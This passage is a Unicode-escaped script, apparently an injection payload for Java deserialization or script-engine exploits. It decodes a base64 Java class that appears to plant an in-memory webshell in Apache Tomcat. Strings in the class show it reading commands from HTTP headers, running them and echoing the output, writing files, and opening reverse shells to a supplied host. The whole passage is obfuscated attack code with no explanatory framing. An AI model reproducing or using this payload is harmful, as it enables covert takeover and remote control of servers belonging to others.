\u0065\u0072\u0072\u006f\u0072\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0065\u0072\u0072\u006f\u0072\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0066\u0069\u006e\u0061\u006c\u006c\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006c\u007a\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0063\u006f\u006d\u006d\u006f\u006e\u0073\u002e\u0063\u006f\u0064\u0065\u0063\u002e\u0062\u0069\u006e\u0061\u0072\u0079\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0076\u0061\u0072\u0020\u0063\u006f\u0064\u0065\u003d\u005c\u0022\u0079\u0076\u0036\u0036\u0076\u0067\u0041\u0041\u0041\u0044\u0045\u0042\u006a\u0077\u006f\u0041\u0048\u0067\u0043\u006e\u0043\u0067\u0042\u0044\u0041\u004b\u0067\u004b\u0041\u0045\u004d\u0041\u0071\u0051\u006f\u0041\u0048\u0067\u0043\u0071\u0043\u0041\u0043\u0072\u0043\u0067\u0041\u0063\u0041\u004b\u0077\u004b\u0041\u004b\u0030\u0041\u0072\u0067\u006f\u0041\u0072\u0051\u0043\u0076\u0042\u0077\u0043\u0077\u0043\u0067\u0042\u0044\u0041\u004c\u0045\u0049\u0041\u004a\u0038\u004b\u0041\u0043\u0045\u0041\u0073\u0067\u0067\u0041\u0073\u0077\u0067\u0041\u0074\u0041\u0063\u0041\u0074\u0051\u0067\u0041\u0074\u0067\u0067\u0041\u0074\u0077\u0063\u0041\u0075\u0041\u006f\u0041\u0048\u0041\u0043\u0035\u0043\u0041\u0043\u0036\u0043\u0041\u0043\u0037\u0042\u0077\u0043\u0038\u0043\u0077\u0041\u0057\u0041\u004c\u0030\u004c\u0041\u004c\u0034\u0041\u0076\u0077\u0073\u0041\u0076\u0067\u0044\u0041\u0043\u0041\u0044\u0042\u0043\u0041\u0044\u0043\u0042\u0077\u0044\u0044\u0043\u0067\u0041\u0063\u0041\u004d\u0051\u0048\u0041\u004d\u0055\u004b\u0041\u004d\u0059\u0041\u0078\u0077\u0067\u0041\u0079\u0041\u0063\u0041\u0079\u0051\u0067\u0041\u0079\u0067\u006f\u0041\u006a\u0041\u0044\u004c\u0043\u0067\u0041\u0068\u0041\u004d\u0077\u0049\u0041\u004d\u0030\u004a\u0041\u004d\u0034\u0041\u007a\u0077\u006f\u0041\u007a\u0067\u0044\u0051\u0043\u0041\u0044\u0052\u0043\u0067\u0043\u004d\u0041\u004e\u0049\u004b\u0041\u0042\u0077\u0041\u0030\u0077\u0067\u0041\u0031\u0041\u0063\u0041\u0031\u0051\u006f\u0041\u0048\u0041\u0044\u0057\u0043\u0041\u0044\u0058\u0042\u0077\u0044\u0059\u0043\u0041\u0044\u005a\u0043\u0041\u0044\u0061\u0043\u0067\u0041\u0063\u0041\u004e\u0073\u0048\u0041\u004e\u0077\u004b\u0041\u0045\u004d\u0041\u0033\u0051\u006f\u0041\u0033\u0067\u0044\u0053\u0043\u0041\u0044\u0066\u0043\u0067\u0041\u0068\u0041\u004f\u0041\u0049\u0041\u004f\u0045\u004b\u0041\u0043\u0045\u0041\u0034\u0067\u0067\u0041\u0034\u0077\u006f\u0041\u0049\u0051\u0044\u006b\u0043\u0067\u0043\u004d\u0041\u004f\u0055\u0049\u0041\u004f\u0059\u004b\u0041\u0043\u0045\u0041\u0035\u0077\u0067\u0041\u0036\u0041\u006b\u0041\u006a\u0041\u0044\u0070\u0043\u0067\u0044\u004f\u0041\u004f\u006f\u004a\u0041\u0049\u0077\u0041\u0036\u0077\u0063\u0041\u0037\u0041\u006f\u0041\u0051\u0077\u0044\u0074\u0043\u0067\u0042\u0044\u0041\u004f\u0034\u0049\u0041\u004b\u0041\u0049\u0041\u004f\u0038\u0049\u0041\u0050\u0041\u004b\u0041\u0049\u0077\u0041\u0038\u0051\u0067\u0041\u0038\u0067\u006f\u0041\u006a\u0041\u0044\u007a\u0042\u0077\u0044\u0030\u0043\u0067\u0042\u004d\u0041\u0050\u0055\u0048\u0041\u0050\u0059\u004b\u0041\u0045\u0034\u0041\u0039\u0077\u006f\u0041\u006a\u0041\u0044\u0034\u0043\u0067\u0042\u004f\u0041\u0050\u006b\u004b\u0041\u0045\u0034\u0041\u002b\u0067\u006f\u0041\u0054\u0067\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0050\u0077\u004b\u0041\u0045\u0077\u0041\u002f\u0051\u006f\u0041\u0049\u0051\u0044\u002b\u0043\u0041\u0044\u002f\u0043\u0067\u0045\u0041\u0041\u0051\u0045\u004b\u0041\u0043\u0045\u0042\u0041\u0067\u0067\u0042\u0041\u0077\u0067\u0042\u0042\u0041\u0067\u0042\u0042\u0051\u0063\u0042\u0042\u0067\u006f\u0041\u0058\u0051\u0043\u006e\u0043\u0067\u0042\u0064\u0041\u0051\u0063\u0049\u0041\u0051\u0067\u004b\u0041\u0046\u0030\u0041\u002f\u0041\u0067\u0042\u0043\u0051\u0067\u0042\u0043\u0067\u0067\u0042\u0043\u0077\u0067\u0042\u0044\u0041\u006f\u0042\u0044\u0051\u0045\u004f\u0043\u0067\u0045\u004e\u0041\u0051\u0038\u0048\u0041\u0052\u0041\u004b\u0041\u0052\u0045\u0042\u0045\u0067\u006f\u0041\u0061\u0041\u0045\u0054\u0043\u0041\u0045\u0055\u0043\u0067\u0042\u006f\u0041\u0052\u0055\u004b\u0041\u0047\u0067\u0041\u0076\u0077\u006f\u0041\u0061\u0041\u0045\u0057\u0043\u0067\u0045\u0052\u0041\u0052\u0063\u004b\u0041\u0052\u0045\u0042\u0047\u0041\u0067\u0042\u0047\u0051\u0067\u0042\u0047\u0067\u006f\u0042\u0044\u0051\u0045\u0062\u0042\u0077\u0045\u0063\u0043\u0067\u0042\u0030\u0041\u0052\u0030\u004b\u0041\u0048\u0051\u0042\u0045\u0067\u006f\u0042\u0045\u0051\u0045\u0065\u0043\u0067\u0042\u0030\u0041\u0052\u0034\u004b\u0041\u0048\u0051\u0042\u0048\u0077\u006f\u0042\u0049\u0041\u0045\u0068\u0043\u0067\u0045\u0067\u0041\u0053\u0049\u004b\u0041\u0053\u004d\u0042\u004a\u0041\u006f\u0042\u0049\u0077\u0044\u0036\u0042\u0051\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0079\u0043\u0067\u0042\u0044\u0041\u0053\u0055\u004b\u0041\u0052\u0045\u0042\u004a\u0067\u006f\u0041\u0064\u0041\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0053\u0063\u004b\u0041\u004d\u0034\u0042\u004b\u0041\u006f\u0041\u006a\u0041\u0045\u0070\u0043\u0041\u0045\u0071\u0043\u0041\u0045\u0072\u0043\u0041\u0045\u0073\u0043\u0041\u0045\u0074\u0043\u0041\u0043\u006a\u0043\u0041\u0045\u0075\u0042\u0077\u0045\u0076\u0041\u0051\u0041\u0043\u0061\u0058\u0041\u0042\u0041\u0042\u004a\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0052\u0077\u0062\u0033\u004a\u0030\u0041\u0051\u0041\u0054\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0042\u006a\u0078\u0070\u0062\u006d\u006c\u0030\u0050\u0067\u0045\u0041\u0041\u0079\u0067\u0070\u0056\u0067\u0045\u0041\u0042\u0045\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0041\u0039\u004d\u0061\u0057\u0035\u006c\u0054\u006e\u0056\u0074\u0059\u006d\u0056\u0079\u0056\u0047\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u0070\u0046\u0065\u0047\u004e\u006c\u0063\u0048\u0052\u0070\u0062\u0032\u0035\u007a\u0041\u0051\u0041\u004a\u0062\u0047\u0039\u0068\u005a\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0041\u0051\u0041\u006c\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u004f\u0077\u0045\u0041\u0043\u0056\u004e\u0070\u005a\u0032\u0035\u0068\u0064\u0048\u0056\u0079\u005a\u0051\u0045\u0041\u004b\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0077\u0071\u0050\u006a\u0073\u0042\u0041\u0041\u0056\u0077\u0063\u006d\u0039\u0034\u0065\u0051\u0045\u0041\u004a\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0046\u0064\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0044\u0067\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u006d\u004e\u0073\u005a\u0057\u0046\u0079\u0055\u0047\u0046\u0079\u0059\u0057\u0030\u0042\u0041\u0041\u0052\u006c\u0065\u0047\u0056\u006a\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0051\u0045\u0041\u0046\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0074\u004a\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u0079\u0064\u0057\u0034\u0042\u0041\u0041\u005a\u006b\u005a\u0057\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0042\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u004b\u0055\u0032\u0039\u0031\u0063\u006d\u004e\u006c\u0052\u006d\u006c\u0073\u005a\u0051\u0045\u0041\u0042\u0030\u0045\u0030\u004c\u006d\u0070\u0068\u0064\u006d\u0045\u004d\u0041\u004a\u0045\u0041\u006b\u0067\u0077\u0042\u004d\u0041\u0045\u0078\u0044\u0041\u0045\u0079\u0041\u0054\u004d\u004d\u0041\u0054\u0051\u0042\u004e\u0051\u0045\u0041\u0042\u0033\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0048\u004d\u004d\u0041\u0054\u0059\u0042\u004e\u0077\u0063\u0042\u004f\u0041\u0077\u0042\u004f\u0051\u0045\u0036\u0044\u0041\u0045\u0037\u0041\u0054\u0077\u0042\u0041\u0042\u004e\u0062\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0044\u0041\u0045\u0039\u0041\u0054\u0034\u004d\u0041\u0054\u0038\u0042\u0051\u0041\u0045\u0041\u0042\u0047\u0068\u0030\u0064\u0048\u0041\u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0035\u0076\u0055\u0033\u0056\u006a\u0061\u0045\u005a\u0070\u005a\u0057\u0078\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0042\u0041\u0054\u0055\u0042\u0041\u0041\u005a\u006e\u0062\u0047\u0039\u0069\u0059\u0057\u0077\u0042\u0041\u0041\u0070\u0077\u0063\u006d\u0039\u006a\u005a\u0058\u004e\u007a\u0062\u0033\u004a\u007a\u0041\u0051\u0041\u004f\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u0078\u0070\u0063\u0033\u0051\u004d\u0041\u0055\u0049\u0042\u0051\u0077\u0063\u0042\u0052\u0041\u0077\u0042\u0052\u0051\u0046\u0047\u0044\u0041\u0046\u0048\u0041\u0055\u0067\u0042\u0041\u0041\u004e\u0079\u005a\u0058\u0045\u0042\u0041\u0041\u0074\u006e\u005a\u0058\u0052\u0053\u005a\u0058\u004e\u0077\u0062\u0032\u0035\u007a\u005a\u0051\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0077\u0077\u0042\u0053\u0051\u0046\u004b\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0041\u0063\u0042\u0053\u0077\u0077\u0042\u0054\u0041\u0046\u004e\u0041\u0051\u0041\u004a\u005a\u0032\u0056\u0030\u0053\u0047\u0056\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u0077\u0045\u0041\u0041\u0032\u004e\u0074\u005a\u0041\u0077\u0041\u006d\u0067\u0043\u0062\u0044\u0041\u0046\u004f\u0041\u0055\u0038\u0042\u0041\u0041\u006c\u007a\u005a\u0058\u0052\u0054\u0064\u0047\u0046\u0030\u0064\u0058\u004d\u0048\u0041\u0056\u0041\u004d\u0041\u0056\u0045\u0042\u0055\u0067\u0077\u0042\u0055\u0077\u0046\u0055\u0041\u0051\u0041\u006b\u0062\u0033\u004a\u006e\u004c\u006d\u0046\u0077\u0059\u0057\u004e\u006f\u005a\u0053\u0035\u0030\u0062\u0032\u0031\u006a\u0059\u0058\u0051\u0075\u0064\u0058\u0052\u0070\u0062\u0043\u0035\u0069\u0064\u0057\u0059\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004e\u006f\u0064\u0057\u0035\u0072\u0044\u0041\u0043\u0057\u0041\u004a\u0063\u004d\u0041\u0056\u0055\u0042\u0053\u0041\u0045\u0041\u0043\u0048\u004e\u006c\u0064\u0045\u004a\u0035\u0064\u0047\u0056\u007a\u0041\u0051\u0041\u0043\u0057\u0030\u0049\u004d\u0041\u0056\u0059\u0042\u0053\u0067\u0045\u0041\u0042\u0032\u0052\u0076\u0056\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0041\u0051\u0041\u0054\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0075\u0061\u0057\u0038\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004a\u0031\u005a\u006d\u005a\u006c\u0063\u0067\u0045\u0041\u0042\u0048\u0064\u0079\u0059\u0058\u0041\u004d\u0041\u0056\u0063\u0041\u006c\u0077\u0045\u0041\u0049\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0035\u0076\u0064\u0045\u005a\u0076\u0064\u0057\u0035\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0059\u0041\u0056\u006b\u0048\u0041\u0056\u006f\u0042\u0041\u0041\u0041\u004d\u0041\u0056\u0073\u0042\u0058\u0041\u0045\u0041\u0045\u0047\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0062\u006d\u0039\u0030\u0049\u0047\u0035\u0031\u0062\u0047\u0077\u004d\u0041\u0056\u0030\u0042\u0050\u0067\u0045\u0041\u0042\u0053\u004d\u006a\u0049\u0079\u004d\u006a\u0044\u0041\u0046\u0065\u0041\u0056\u0038\u004d\u0041\u004a\u0034\u0041\u006d\u0077\u0045\u0041\u0041\u0054\u006f\u004d\u0041\u0057\u0041\u0042\u0059\u0051\u0045\u0041\u0049\u006d\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0053\u0042\u006f\u0062\u0033\u004e\u0030\u0049\u0047\u005a\u0076\u0063\u006d\u0031\u0068\u0064\u0043\u0042\u006c\u0063\u006e\u004a\u0076\u0063\u0069\u0045\u004d\u0041\u0049\u0030\u0041\u006a\u0067\u0077\u0042\u0059\u0067\u0046\u006a\u0044\u0041\u0043\u0050\u0041\u004a\u0041\u0042\u0041\u0042\u0042\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0044\u0041\u0043\u0052\u0041\u0057\u0051\u004d\u0041\u0057\u0055\u0041\u006b\u0067\u0045\u0041\u0042\u0053\u0051\u006b\u004a\u0043\u0051\u006b\u0041\u0051\u0041\u0053\u005a\u006d\u006c\u0073\u005a\u0053\u0042\u006d\u0062\u0033\u004a\u0074\u0059\u0058\u0051\u0067\u005a\u0058\u004a\u0079\u0062\u0033\u0049\u0068\u0044\u0041\u0043\u0063\u0041\u004a\u0030\u0042\u0041\u0041\u0056\u0041\u0051\u0045\u0042\u0041\u0051\u0041\u0077\u0041\u006e\u0077\u0043\u0062\u0041\u0051\u0041\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0047\u0061\u0057\u0078\u006c\u0044\u0041\u0043\u0052\u0041\u0057\u0059\u0042\u0041\u0042\u0068\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u005a\u0070\u0062\u0047\u0056\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u004d\u0041\u004a\u0045\u0042\u005a\u0077\u0077\u0041\u006f\u0077\u0043\u006b\u0044\u0041\u0043\u0063\u0041\u0057\u0067\u004d\u0041\u0057\u006b\u0041\u006b\u0067\u0077\u0042\u0061\u0067\u0043\u0053\u0044\u0041\u0046\u0072\u0041\u0054\u0034\u004d\u0041\u0057\u0077\u0042\u0050\u0067\u0077\u0042\u0062\u0051\u0046\u0075\u0041\u0051\u0041\u0048\u0062\u0033\u004d\u0075\u0062\u006d\u0046\u0074\u005a\u0051\u0063\u0042\u0062\u0077\u0077\u0042\u0063\u0041\u0043\u0062\u0044\u0041\u0046\u0078\u0041\u0054\u0034\u0042\u0041\u0041\u004e\u0033\u0061\u0057\u0034\u0042\u0041\u0041\u0052\u0077\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0043\u004c\u0057\u0034\u0042\u0041\u0042\u0064\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068